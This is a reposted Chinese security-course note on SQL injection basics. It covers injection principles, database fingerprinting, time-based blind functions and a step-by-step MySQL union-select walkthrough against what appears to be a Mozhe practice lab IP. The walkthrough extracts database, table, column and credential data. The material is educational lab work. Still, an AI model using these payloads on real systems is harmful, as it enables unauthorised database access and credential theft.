主頁 >  其他 > 《小迪網路安全筆記》 第十二節:WEB漏洞-SQL注入之簡要SQL注入

《小迪網路安全筆記》 第十二節:WEB漏洞-SQL注入之簡要SQL注入

2021-08-23 06:49:23 其他

前言

在本系列課程學習中,SQL注入漏洞將是重點部分,其中SQL注入又非常復雜,區分各種資料庫型別,提交方法,資料型別等注入,我們需要按部就班的學習,才能學會相關SQL注入的核心,同樣此類漏洞是WEB安全中嚴重的安全漏洞,學習如何利用,挖掘,修復也是很重要的,
請添加圖片描述

注:左邊的比右邊的難,學習順序為從右向左,

一、忍者安全測驗系統使用說明

二、上述思維導圖簡要說明

請添加圖片描述

作業系統:windows和linux對大小寫敏感不同,如果查了作業系統可以避免這個問題,


資料庫名:如果不知道資料庫名查詢的時候會有問題,


資料庫用戶:判定是否為高權限,如果是高權限則選擇的余地更多,


檔案讀寫:檔案讀寫需要路徑,所以可以通過檔案讀寫查到路徑,

注:資料庫5.0以上為高版本,5.0以下為低版本,

三、SQL注入安全測驗中危害

1、通過注入點直接獲取權限,操作后臺資料庫,危害資料

2、通過注入點獲取部分內容,之后通過其他方法來獲取權限,危害網站權限

注:如果SQL陳述句中不存在變數,則不能操作,也就不會產生漏洞,

四、SQL注入產生原理詳細分析

(1)可控變數,帶入資料庫查詢,變數未存在過濾或過濾不嚴謹,即如果過濾比較嚴謹,則沒有注入點,

(2)通過引數傳遞到原有的SQL陳述句中,從而實作自定義的查詢,即把惡意代碼傳遞到對方網站中,

注:(1)和(2)是一個意思,

(3)例題

①下列可能存在注入的編號選項有哪幾個?

www.xiaodi8.com/index.php?id=8

www.xiaodi8.com/?id=10(雖然前面沒有index.php,但是網站默認是加上的,)

www.xiaodi8.com/?id=10&x=1(兩個引數,哪個能注入用哪個)

www.xiaodi8.com/index.php(post注入)

答案:四個都對,但是以目前的實力來說,只能理解到12或者123,,

②引數x有注入,以下哪個注入正確?

www.xiaodi8.com/news.php?y=1 and 1=1&1=2(and 1=1應該寫在x后面)

www.xiaodi8.com/news.php?y=1&x=2 and 1=1

www.xiaodi8.com/news.php?y=1 and 1=1&x=2 and 1=1

www.xiaodi8.com/news.php?xx=1 and 1=1 &xxx=2 and 1=1(前面是xx,后面是xxx,引數名不對)

答案:bc

注:注入點要寫在id的后面,

五、搭建第一個SQL注入學習靶場環境

https://blog.csdn.net/weixin_43211186/article/details/103008549

https://www.fujieace.com/penetration-test/sqli-labs-ec.html

注:前半部分用第一個,后半部分用第二個,

六、資料庫結構

1、MySQL資料庫

(1)結構

資料庫a=網站a

? 表名

? 列名

? 資料

資料庫b=網站b

? 表名

? 列名

? 資料

資料庫c=網站c

? 表名

? 列名

? 資料

(2)注入程序

  • 獲取資料庫對應網站
  • 獲取表名
  • 獲取列名
  • 獲取資料

(3)資料庫基本命令

show databases; 顯示資料庫名


use 資料庫名 使用這個資料庫


show tables 顯示所有表(表名)


select * fn_member; 所有范圍內查詢member(*表示查詢所有)

請添加圖片描述

select password from fn_member; 在fn_member表里查詢password列

七、怎么判斷資料庫型別

1、前端與資料庫型別

asp:SQL Server,Access
.net:SQL Server
php:MySQL,PostgreSQL
java:Oracle,MySQL

2、根據埠判斷

Oracle:默認埠1521
SQL Server:默認埠1433
MySQL:默認埠3306

3、根據資料庫特有函式來判斷

(1)len和length

len():SQL Server 、MySQL以及db2回傳長度的函式,
length():Oracle和INFORMIX回傳長度的函式,

(2)version和@@version

version():MySQL查詢版本資訊的函式
@@version:MySQL和SQL Server查詢版本資訊的函式

(3)substring和substr

MySQL兩個函式都可以使用
Oracle只可呼叫substr
SQL Server只可呼叫substring

4、根據特殊符號進行判斷

/*是MySQL資料庫的注釋符
--是Oracle和SQL Server支持的注釋符
;是子句查詢識別符號,Oracle不支持多行查詢,若回傳錯誤,則說明可能是Oracle資料庫
#是MySQL中的注釋符,回傳錯誤則說明可能不是MySQL,另外也支持-- 和/**/

5、根據資料庫對字串的處理方式判斷

(1)MySQL

http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' 
http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab' 

(2)Oracle

http://127.0.0.1/test.php?id=1 and 'a'||'b'='ab' 
http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab' 

(3)SQL Server

http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' 

6、根據資料庫特有的資料表來判斷

(1)MySQL(version>5.0)

http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

(2)Oracle

http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

(3)SQL Server

http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

7、根據盲注特別函式判斷

(1)MySQL

BENCHMARK(1000000,ENCODE(‘QWE’,‘ASD’))
SLEEP(5)

(2)PostgreSQL

PG_SLEEP(5)
GENERATE_SERIES(1,1000000)

(3)SQL Server

WAITFOR DELAY ‘0:0:5’

八、如何判斷注入點

1、老方法

(1)程序

and 1=1 頁面正常

and 1=2 頁面錯誤

可能存在注入點

(2)原理

在資料庫中存在邏輯運算子(或or、且and、非xor),用and 1=1來判定,如果是1=1表示真且真,其中且就是and,如果是1=2則為真且假,邏輯不成立,所以回傳的是錯誤頁面,

2、新方法

在id=1的后面隨便輸入東西,如果有錯誤,則說明他帶入了資料庫查詢了,則說明有注入點

注:如果結果是404錯誤或者直接跳轉,則說明網站對輸入的東西有檢測,則說明這個網站沒有漏洞,

九、學習第一個資料庫MySQL簡單注入

1、注入步驟

(1)判斷注入

(2)猜解列名數量(欄位數) order by x 錯誤與正常的臨界值

? http://219.153.49.228:48354/new_list.php?id=1 order by 4

(3)報錯猜解準備(目的是為了讓它報錯)

http://219.153.49.228:48354/new_list.php?id=1%20union%20select%1,2,3,4

http://219.153.49.228:48354/new_list.php?id=-1%20union%20select%201,2,3,4

注:報錯數字是隨機產生,報錯什么數字就用什么數字查,比如報了2和3,則用2和3查,

(4)查詢

http://219.153.49.228:48354/new_list.php?id=-1%20union%20select%201,database(),version(),4 (查詢資料庫名稱和資料庫版本)

http://219.153.49.228:48354/new_list.php?id=-1%20union%20select%201,user(),@@version_compile_os,4 (查詢資料庫用戶和作業系統)

注:@@version_compile_os后面沒有括號!!!

(5)查詢指定資料庫名mozhe_Discuz_StormGroup下的表名資訊:

http://219.153.49.228:48354/new_list.php?id=-1%20union%20select%201,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’

注解:

union%20select 查詢

table_name 表名

information_schema.tables 記錄所有表名資訊的表

where 條件

table_schema 資料庫名

mozhe_Discuz_StormGroup 需要查詢的資料庫名

group_concat(table_name) 查詢所有表名

(6)查詢指定表名StormGroup_member下的列名資訊:

http://219.153.49.228:48354/new_list.php?id=-1%20union%20select%201,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’

(7)查詢指定資料

http://219.153.49.228:48354/new_list.php?id=-1%20union%20select%201,name,password,4 StormGroup_member

2、資訊收集

資料庫版本:version() 5.7.22-0ubuntu0.16.04.1

資料庫名稱:database() mozhe_Discuz_StormGroup

資料庫用戶:user() root@localhost

作業系統:@@version_compile_os Linux

3、必要知識點

(1)在MySQL5.0以上版本中,MySQL存在一個自帶資料庫名為information_achema,它是一個存盤記錄所有資料庫名、表名、列名的資料庫,也相當于可以通過查詢它獲取指定資料庫下面的表名或列名資訊,

(2)資料庫中符號.代表下一級,如xaiodi.user表示xiaodi資料庫下的user表名,

(3)information_schema.tables:記錄所有表名資訊的表

? information_schema.columns:記錄所有列名資訊的表

? table_name:表名

? column_name:列名

? table_schema:資料庫名

注:猜解多個資料可以采用limit,x,1變動猜解,x為變數值

十、案例演示:

1、簡易代碼分析SQL注入原理

2、Sqlilabs注入靶場搭建簡要使用

3、墨者靶機真實MYSQL注入演示

十一、涉及資源:

https://github.com/Audi-1/sqli-labs

QQ群檔案-忍者安全測驗系統-禁用軟盤安裝

https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/295569.html

標籤:其他

上一篇:Web安全之檔案上傳漏洞

下一篇:vulnhub DC7 靶場練習

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more